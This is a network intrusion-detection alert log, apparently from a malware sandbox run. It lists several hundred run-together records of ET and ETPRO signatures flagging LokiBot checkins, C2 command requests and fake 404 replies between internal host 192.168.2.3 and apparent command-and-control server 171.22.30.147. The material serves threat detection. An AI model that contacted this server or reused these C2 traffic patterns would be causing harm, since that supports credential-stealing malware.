              192.168.2.3171.22.30.14750023802024313 01/05/23-08:53:47.546596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749918802825766 01/05/23-08:53:15.920283TCP2825766ETPRO TROJAN LokiBot Checkin M24991880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497462025483 01/05/23-08:52:24.379899TCP2025483ET TROJAN LokiBot Fake 404 Response8049746171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749874802024318 01/05/23-08:53:02.624496TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749829802025381 01/05/23-08:52:49.001962TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749874802024313 01/05/23-08:53:02.624496TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749827802024318 01/05/23-08:52:48.461129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749732802024318 01/05/23-08:52:20.401546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750018802021641 01/05/23-08:53:44.999195TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749899802025381 01/05/23-08:53:10.169881TCP2025381ET TROJAN LokiBot Checkin4989980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749732802024313 01/05/23-08:52:20.401546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749945802024318 01/05/23-08:53:23.275014TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749885802021641 01/05/23-08:53:05.575803TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749734802025381 01/05/23-08:52:20.978367TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749930802025381 01/05/23-08:53:19.220224TCP2025381ET TROJAN LokiBot Checkin4993080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750048802025381 01/05/23-08:53:54.265201TCP2025381ET TROJAN LokiBot Checkin5004880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749957802024313 01/05/23-08:53:26.768134TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750053802021641 01/05/23-08:53:55.636070TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497872025483 01/05/23-08:52:37.593230TCP2025483ET TROJAN LokiBot Fake 404 Response8049787171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749716802024318 01/05/23-08:52:14.357533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749708802825766 01/05/23-08:52:10.789251TCP2825766ETPRO TROJAN LokiBot Checkin M24970880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749717802825766 01/05/23-08:52:14.673219TCP2825766ETPRO TROJAN LokiBot Checkin M24971780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497652025483 01/05/23-08:52:29.829156TCP2025483ET TROJAN LokiBot Fake 404 Response8049765171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749890802024313 01/05/23-08:53:06.934564TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750049802024313 01/05/23-08:53:54.543372TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749701802021641 01/05/23-08:52:07.731855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749914802021641 01/05/23-08:53:14.852027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750049802024318 01/05/23-08:53:54.543372TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749890802024318 01/05/23-08:53:06.934564TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749901802825766 01/05/23-08:53:11.357263TCP2825766ETPRO TROJAN LokiBot Checkin M24990180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749704802021641 01/05/23-08:52:08.934535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750069802825766 01/05/23-08:53:59.913079TCP2825766ETPRO TROJAN LokiBot Checkin M25006980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749739802021641 01/05/23-08:52:22.339123TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749716802024313 01/05/23-08:52:14.357533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750040802825766 01/05/23-08:53:52.135869TCP2825766ETPRO TROJAN LokiBot Checkin M25004080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750081802021641 01/05/23-08:54:03.233046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749888802021641 01/05/23-08:53:06.392338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749735802024318 01/05/23-08:52:21.259701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749871802024313 01/05/23-08:53:01.829225TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749873802025381 01/05/23-08:53:02.352866TCP2025381ET TROJAN LokiBot Checkin4987380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749942802021641 01/05/23-08:53:22.441601TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750009802021641 01/05/23-08:53:42.368696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749826802025381 01/05/23-08:52:48.184567TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749743802025381 01/05/23-08:52:23.467755TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749871802024318 01/05/23-08:53:01.829225TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749956802025381 01/05/23-08:53:26.250117TCP2025381ET TROJAN LokiBot Checkin4995680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749872802825766 01/05/23-08:53:02.084337TCP2825766ETPRO TROJAN LokiBot Checkin M24987280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498512025483 01/05/23-08:52:56.520867TCP2025483ET TROJAN LokiBot Fake 404 Response8049851171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500212025483 01/05/23-08:53:46.439893TCP2025483ET TROJAN LokiBot Fake 404 Response8050021171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500272025483 01/05/23-08:53:48.680434TCP2025483ET TROJAN LokiBot Fake 404 Response8050027171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749781802024313 01/05/23-08:52:35.821668TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498182025483 01/05/23-08:52:46.103882TCP2025483ET TROJAN LokiBot Fake 404 Response8049818171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749781802024318 01/05/23-08:52:35.821668TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749887802825766 01/05/23-08:53:06.117016TCP2825766ETPRO TROJAN LokiBot Checkin M24988780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749731802825766 01/05/23-08:52:20.113614TCP2825766ETPRO TROJAN LokiBot Checkin M24973180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750046802025381 01/05/23-08:53:53.748051TCP2025381ET TROJAN LokiBot Checkin5004680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749848802024313 01/05/23-08:52:55.640788TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749826802825766 01/05/23-08:52:48.184567TCP2825766ETPRO TROJAN LokiBot Checkin M24982680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749825802024318 01/05/23-08:52:47.903129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749844802825766 01/05/23-08:52:54.549139TCP2825766ETPRO TROJAN LokiBot Checkin M24984480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749703802825766 01/05/23-08:52:08.565296TCP2825766ETPRO TROJAN LokiBot Checkin M24970380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750066802825766 01/05/23-08:53:59.096230TCP2825766ETPRO TROJAN LokiBot Checkin M25006680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750020802024318 01/05/23-08:53:45.631791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497192025483 01/05/23-08:52:15.922866TCP2025483ET TROJAN LokiBot Fake 404 Response8049719171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749825802024313 01/05/23-08:52:47.903129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750020802024313 01/05/23-08:53:45.631791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497242025483 01/05/23-08:52:18.178959TCP2025483ET TROJAN LokiBot Fake 404 Response8049724171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749852802025381 01/05/23-08:52:56.705137TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749963802021641 01/05/23-08:53:30.141323TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749767802021641 01/05/23-08:52:30.299348TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749769802025381 01/05/23-08:52:30.825016TCP2025381ET TROJAN LokiBot Checkin4976980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750074802025381 01/05/23-08:54:01.233569TCP2025381ET TROJAN LokiBot Checkin5007480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749792802825766 01/05/23-08:52:38.887901TCP2825766ETPRO TROJAN LokiBot Checkin M24979280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749870802025381 01/05/23-08:53:01.561418TCP2025381ET TROJAN LokiBot Checkin4987080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499882025483 01/05/23-08:53:36.904163TCP2025483ET TROJAN LokiBot Fake 404 Response8049988171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500592025483 01/05/23-08:53:57.366003TCP2025483ET TROJAN LokiBot Fake 404 Response8050059171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499822025483 01/05/23-08:53:35.304712TCP2025483ET TROJAN LokiBot Fake 404 Response8049982171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749947802025381 01/05/23-08:53:23.814636TCP2025381ET TROJAN LokiBot Checkin4994780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749754802825766 01/05/23-08:52:26.655822TCP2825766ETPRO TROJAN LokiBot Checkin M24975480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749916802025381 01/05/23-08:53:15.372296TCP2025381ET TROJAN LokiBot Checkin4991680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749932802825766 01/05/23-08:53:19.762349TCP2825766ETPRO TROJAN LokiBot Checkin M24993280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499382025483 01/05/23-08:53:21.462781TCP2025483ET TROJAN LokiBot Fake 404 Response8049938171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750008802025381 01/05/23-08:53:42.094852TCP2025381ET TROJAN LokiBot Checkin5000880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749904802825766 01/05/23-08:53:12.139251TCP2825766ETPRO TROJAN LokiBot Checkin M24990480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750047802024318 01/05/23-08:53:54.007519TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750048802825766 01/05/23-08:53:54.265201TCP2825766ETPRO TROJAN LokiBot Checkin M25004880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498832025483 01/05/23-08:53:05.117912TCP2025483ET TROJAN LokiBot Fake 404 Response8049883171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750050802021641 01/05/23-08:53:54.799294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749902802021641 01/05/23-08:53:11.610501TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749919802025381 01/05/23-08:53:16.188265TCP2025381ET TROJAN LokiBot Checkin4991980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749765802021641 01/05/23-08:52:29.748218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750069802025381 01/05/23-08:53:59.913079TCP2025381ET TROJAN LokiBot Checkin5006980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497522025483 01/05/23-08:52:26.122774TCP2025483ET TROJAN LokiBot Fake 404 Response8049752171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749905802021641 01/05/23-08:53:12.409052TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750055802021641 01/05/23-08:53:56.183544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749753802024318 01/05/23-08:52:26.326305TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749700802825766 01/05/23-08:52:07.351938TCP2825766ETPRO TROJAN LokiBot Checkin M24970080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749857802021641 01/05/23-08:52:58.054307TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749727802021641 01/05/23-08:52:18.985108TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499002025483 01/05/23-08:53:11.081962TCP2025483ET TROJAN LokiBot Fake 404 Response8049900171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749944802025381 01/05/23-08:53:23.021157TCP2025381ET TROJAN LokiBot Checkin4994480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750009802024313 01/05/23-08:53:42.368696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749871802021641 01/05/23-08:53:01.829225TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749931802024318 01/05/23-08:53:19.484274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750009802024318 01/05/23-08:53:42.368696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749753802024313 01/05/23-08:52:26.326305TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750075802024313 01/05/23-08:54:01.517358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749716802021641 01/05/23-08:52:14.357533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749931802024313 01/05/23-08:53:19.484274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750075802024318 01/05/23-08:54:01.517358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749793802021641 01/05/23-08:52:39.171445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749803802025381 01/05/23-08:52:41.905218TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749853802024313 01/05/23-08:52:56.960046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749853802024318 01/05/23-08:52:56.960046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750027802021641 01/05/23-08:53:48.599181TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749979802825766 01/05/23-08:53:34.430839TCP2825766ETPRO TROJAN LokiBot Checkin M24997980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749758802025381 01/05/23-08:52:27.765970TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749879802024313 01/05/23-08:53:03.965987TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500052025483 01/05/23-08:53:41.369351TCP2025483ET TROJAN LokiBot Fake 404 Response8050005171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749847802025381 01/05/23-08:52:55.372015TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749823802825766 01/05/23-08:52:47.379297TCP2825766ETPRO TROJAN LokiBot Checkin M24982380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749928802021641 01/05/23-08:53:18.678448TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498732025483 01/05/23-08:53:02.440443TCP2025483ET TROJAN LokiBot Fake 404 Response8049873171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750080802825766 01/05/23-08:54:02.852694TCP2825766ETPRO TROJAN LokiBot Checkin M25008080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749839802021641 01/05/23-08:52:53.202583TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750043802025381 01/05/23-08:53:52.949985TCP2025381ET TROJAN LokiBot Checkin5004380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749756802024318 01/05/23-08:52:27.231494TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749822802024313 01/05/23-08:52:47.112264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749756802024313 01/05/23-08:52:27.231494TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749762802021641 01/05/23-08:52:28.868227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749822802024318 01/05/23-08:52:47.112264TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749744802021641 01/05/23-08:52:23.736699TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749786802025381 01/05/23-08:52:37.217550TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749804802024318 01/05/23-08:52:42.167879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497742025483 01/05/23-08:52:32.449175TCP2025483ET TROJAN LokiBot Fake 404 Response8049774171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749810802021641 01/05/23-08:52:43.863274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749982802025381 01/05/23-08:53:35.215314TCP2025381ET TROJAN LokiBot Checkin4998280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750047802024313 01/05/23-08:53:54.007519TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749940802021641 01/05/23-08:53:21.893765TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749833802021641 01/05/23-08:52:50.090304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749875802025381 01/05/23-08:53:02.907470TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498392025483 01/05/23-08:52:53.283912TCP2025483ET TROJAN LokiBot Fake 404 Response8049839171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499602025483 01/05/23-08:53:28.551541TCP2025483ET TROJAN LokiBot Fake 404 Response8049960171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749980802024318 01/05/23-08:53:34.702395TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749981802825766 01/05/23-08:53:34.961120TCP2825766ETPRO TROJAN LokiBot Checkin M24998180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749784802024318 01/05/23-08:52:36.673037TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749790802021641 01/05/23-08:52:38.345416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749850802024318 01/05/23-08:52:56.172529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749850802024313 01/05/23-08:52:56.172529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749879802024318 01/05/23-08:53:03.965987TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749784802024313 01/05/23-08:52:36.673037TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749980802024313 01/05/23-08:53:34.702395TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750001802021641 01/05/23-08:53:40.243949TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498232025483 01/05/23-08:52:47.459157TCP2025483ET TROJAN LokiBot Fake 404 Response8049823171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749824802025381 01/05/23-08:52:47.639113TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749849802825766 01/05/23-08:52:55.895226TCP2825766ETPRO TROJAN LokiBot Checkin M24984980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749991802021641 01/05/23-08:53:37.629731TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749994802021641 01/05/23-08:53:38.408241TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750004802021641 01/05/23-08:53:41.033557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749953802825766 01/05/23-08:53:25.469204TCP2825766ETPRO TROJAN LokiBot Checkin M24995380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500112025483 01/05/23-08:53:43.008527TCP2025483ET TROJAN LokiBot Fake 404 Response8050011171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500712025483 01/05/23-08:54:00.509398TCP2025483ET TROJAN LokiBot Fake 404 Response8050071171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749950802825766 01/05/23-08:53:24.624259TCP2825766ETPRO TROJAN LokiBot Checkin M24995080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749861802825766 01/05/23-08:52:59.149010TCP2825766ETPRO TROJAN LokiBot Checkin M24986180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498012025483 01/05/23-08:52:41.456999TCP2025483ET TROJAN LokiBot Fake 404 Response8049801171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749821802025381 01/05/23-08:52:46.829983TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750044802024318 01/05/23-08:53:53.227481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750041802024318 01/05/23-08:53:52.410718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750042802825766 01/05/23-08:53:52.687057TCP2825766ETPRO TROJAN LokiBot Checkin M25004280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750045802825766 01/05/23-08:53:53.481872TCP2825766ETPRO TROJAN LokiBot Checkin M25004580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750041802024313 01/05/23-08:53:52.410718TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749775802825766 01/05/23-08:52:32.683406TCP2825766ETPRO TROJAN LokiBot Checkin M24977580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749718802024318 01/05/23-08:52:15.464089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750032802021641 01/05/23-08:53:49.938594TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749718802024313 01/05/23-08:52:15.464089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749759802024318 01/05/23-08:52:28.024665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498892025483 01/05/23-08:53:06.757466TCP2025483ET TROJAN LokiBot Fake 404 Response8049889171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749699802021641 01/05/23-08:52:06.870270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749848802024318 01/05/23-08:52:55.640788TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749730802024313 01/05/23-08:52:19.853027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749788802021641 01/05/23-08:52:37.784136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749878802025381 01/05/23-08:53:03.704233TCP2025381ET TROJAN LokiBot Checkin4987880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749730802024318 01/05/23-08:52:19.853027TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749966802021641 01/05/23-08:53:30.946864TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996680192.168.2.3171.22.30.147
